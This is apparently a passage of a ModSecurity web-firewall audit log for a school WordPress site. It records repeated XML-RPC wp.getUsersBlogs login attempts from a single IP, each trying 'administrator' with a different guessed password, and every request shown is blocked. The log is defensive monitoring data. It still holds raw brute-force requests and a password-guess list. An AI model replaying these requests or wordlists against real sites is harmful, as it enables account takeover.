Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745077137077695 5142 (- - -)
Stopwatch2: 1745077137077695 5142; combined=3599, p1=458, p2=2968, p3=0, p4=0, p5=102, sr=89, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fa097611-Z--
--2ee9a837-A--
[19/Apr/2025:22:39:57 +0700] aAPDzQ6cTFSgLAHl7PpGegAAAAE 103.236.140.4 40870 103.236.140.4 8181
--2ee9a837-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 240
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--2ee9a837-C--
wp.getUsersBlogs
administrator
administratorpassword
--2ee9a837-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2ee9a837-E--
--2ee9a837-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745077197995267 4140 (- - -)
Stopwatch2: 1745077197995267 4140; combined=3280, p1=369, p2=2725, p3=0, p4=0, p5=108, sr=72, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2ee9a837-Z--
--6f281d66-A--
[19/Apr/2025:22:40:59 +0700] aAPEC0ruoUXZj665VUFrtAAAAM4 103.236.140.4 44238 103.236.140.4 8181
--6f281d66-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 231
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6f281d66-C--
wp.getUsersBlogs
administrator
1q2w3e4r5t6y
--6f281d66-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6f281d66-E--
--6f281d66-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745077259579101 4671 (- - -)
Stopwatch2: 1745077259579101 4671; combined=3434, p1=425, p2=2813, p3=0, p4=0, p5=112, sr=74, sw=84, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6f281d66-Z--
--d2cfc44b-A--
[19/Apr/2025:22:42:01 +0700] aAPESXNa4dA2HllpK_PjeQAAAJY 103.236.140.4 47566 103.236.140.4 8181
--d2cfc44b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 239
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d2cfc44b-C--
wp.getUsersBlogs
administrator
smkn22-jkt.sch123456
--d2cfc44b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d2cfc44b-E--
--d2cfc44b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745077321893282 5421 (- - -)
Stopwatch2: 1745077321893282 5421; combined=3654, p1=509, p2=2988, p3=0, p4=0, p5=97, sr=89, sw=60, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d2cfc44b-Z--
--c33ef873-A--
[19/Apr/2025:22:43:10 +0700] aAPEjuvDiFC_ir7MDwZOvwAAAE4 103.236.140.4 51126 103.236.140.4 8181
--c33ef873-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 236
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--c33ef873-C--
wp.getUsersBlogs
administrator
administrator1983
--c33ef873-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c33ef873-E--
--c33ef873-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745077390559477 5115 (- - -)
Stopwatch2: 1745077390559477 5115; combined=3672, p1=421, p2=2995, p3=0, p4=0, p5=142, sr=84, sw=114, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c33ef873-Z--
--7ca46d39-A--
[19/Apr/2025:22:44:10 +0700] aAPEyuvDiFC_ir7MDwZPDgAAAEM 103.236.140.4 53054 103.236.140.4 8181
--7ca46d39-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 229
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7ca46d39-C--
wp.getUsersBlogs
administrator
#changeme!
--7ca46d39-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7ca46d39-E--
--7ca46d39-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745077450366696 5695 (- - -)
Stopwatch2: 1745077450366696 5695; combined=3897, p1=514, p2=3199, p3=0, p4=0, p5=109, sr=85, sw=75, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7ca46d39-Z--
--888fa613-A--
[19/Apr/2025:22:45:12 +0700] aAPFCA6cTFSgLAHl7PpKTQAAAAI 103.236.140.4 53342 103.236.140.4 8181
--888fa613-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 227
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--888fa613-C--
wp.getUsersBlogs
administrator
1g2w3e4r
--888fa613-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--888fa613-E--
--888fa613-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745077512492909 5445 (- - -)
Stopwatch2: 1745077512492909 5445; combined=3922, p1=477, p2=3251, p3=0, p4=0, p5=114, sr=86, sw=80, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--888fa613-Z--
--07c6b976-A--
[19/Apr/2025:22:46:13 +0700] aAPFRQ6cTFSgLAHl7PpKgQAAAA0 103.236.140.4 53648 103.236.140.4 8181
--07c6b976-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--07c6b976-C--
wp.getUsersBlogs
administrator
yankees
--07c6b976-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--07c6b976-E--
--07c6b976-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745077573042780 5462 (- - -)
Stopwatch2: 1745077573042780 5462; combined=3906, p1=482, p2=3219, p3=0, p4=0, p5=117, sr=87, sw=88, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--07c6b976-Z--
--ab094679-A--
[19/Apr/2025:22:47:14 +0700] aAPFgg6cTFSgLAHl7PpKrAAAABc 103.236.140.4 53948 103.236.140.4 8181
--ab094679-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ab094679-C--
wp.getUsersBlogs
administrator
london
--ab094679-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ab094679-E--
--ab094679-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745077634023040 5623 (- - -)
Stopwatch2: 1745077634023040 5623; combined=4060, p1=514, p2=3191, p3=0, p4=0, p5=193, sr=102, sw=162, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ab094679-Z--
--074c3247-A--
[19/Apr/2025:22:48:22 +0700] aAPFxkruoUXZj665VUFuLwAAAMw 103.236.140.4 54288 103.236.140.4 8181
--074c3247-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 237
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--074c3247-C--
wp.getUsersBlogs
administrator
administrator@1981
--074c3247-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--074c3247-E--
--074c3247-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745077702180254 5264 (- - -)
Stopwatch2: 1745077702180254 5264; combined=3801, p1=442, p2=3183, p3=0, p4=0, p5=103, sr=87, sw=73, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--074c3247-Z--
--f4906e23-A--
[19/Apr/2025:22:49:24 +0700] aAPGBEruoUXZj665VUFuYwAAANQ 103.236.140.4 54576 103.236.140.4 8181
--f4906e23-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 232
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f4906e23-C--
wp.getUsersBlogs
administrator
marketing2019
--f4906e23-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f4906e23-E--
--f4906e23-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745077764576334 5407 (- - -)
Stopwatch2: 1745077764576334 5407; combined=3860, p1=445, p2=3235, p3=0, p4=0, p5=108, sr=86, sw=72, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f4906e23-Z--
--26fdec21-A--
[19/Apr/2025:22:50:26 +0700] aAPGQnNa4dA2HllpK_PkxgAAAIc 103.236.140.4 54914 103.236.140.4 8181
--26fdec21-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--26fdec21-C--
wp.getUsersBlogs
administrator
newcastle
--26fdec21-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--26fdec21-E--
--26fdec21-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (43+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745077826050228 5393 (- - -)
Stopwatch2: 1745077826050228 5393; combined=3810, p1=450, p2=3156, p3=0, p4=0, p5=116, sr=86, sw=88, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--26fdec21-Z--
--5effb900-A--
[19/Apr/2025:22:51:27 +0700] aAPGfw6cTFSgLAHl7PpLBQAAAAE 103.236.140.4 55250 103.236.140.4 8181
--5effb900-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 242
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--5effb900-C--
wp.getUsersBlogs
administrator
smkn22-jkt.sch.id123456
--5effb900-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5effb900-E--
--5effb900-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745077887863245 5027 (- - -)
Stopwatch2: 1745077887863245 5027; combined=3972, p1=426, p2=3371, p3=0, p4=0, p5=102, sr=85, sw=73, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5effb900-Z--
--b5960603-A--
[19/Apr/2025:22:52:34 +0700] aAPGwkruoUXZj665VUFuvwAAAM8 103.236.140.4 55574 103.236.140.4 8181
--b5960603-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--b5960603-C--
wp.getUsersBlogs
administrator
test1
--b5960603-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b5960603-E--
--b5960603-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745077954239472 5756 (- - -)
Stopwatch2: 1745077954239472 5756; combined=3917, p1=501, p2=3243, p3=0, p4=0, p5=103, sr=91, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b5960603-Z--
--374a3c26-A--
[19/Apr/2025:22:53:38 +0700] aAPHAnNa4dA2HllpK_Pk4wAAAI8 103.236.140.4 55882 103.236.140.4 8181
--374a3c26-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--374a3c26-C--
wp.getUsersBlogs
administrator
Admin12
--374a3c26-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--374a3c26-E--
--374a3c26-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078018359509 4993 (- - -)
Stopwatch2: 1745078018359509 4993; combined=3810, p1=456, p2=3155, p3=0, p4=0, p5=115, sr=87, sw=84, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--374a3c26-Z--
--4c0a1b51-A--
[19/Apr/2025:22:54:38 +0700] aAPHPuvDiFC_ir7MDwZPuAAAAEY 103.236.140.4 56166 103.236.140.4 8181
--4c0a1b51-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--4c0a1b51-C--
wp.getUsersBlogs
administrator
nimda
--4c0a1b51-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4c0a1b51-E--
--4c0a1b51-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078078713648 5315 (- - -)
Stopwatch2: 1745078078713648 5315; combined=4199, p1=497, p2=3522, p3=0, p4=0, p5=106, sr=90, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
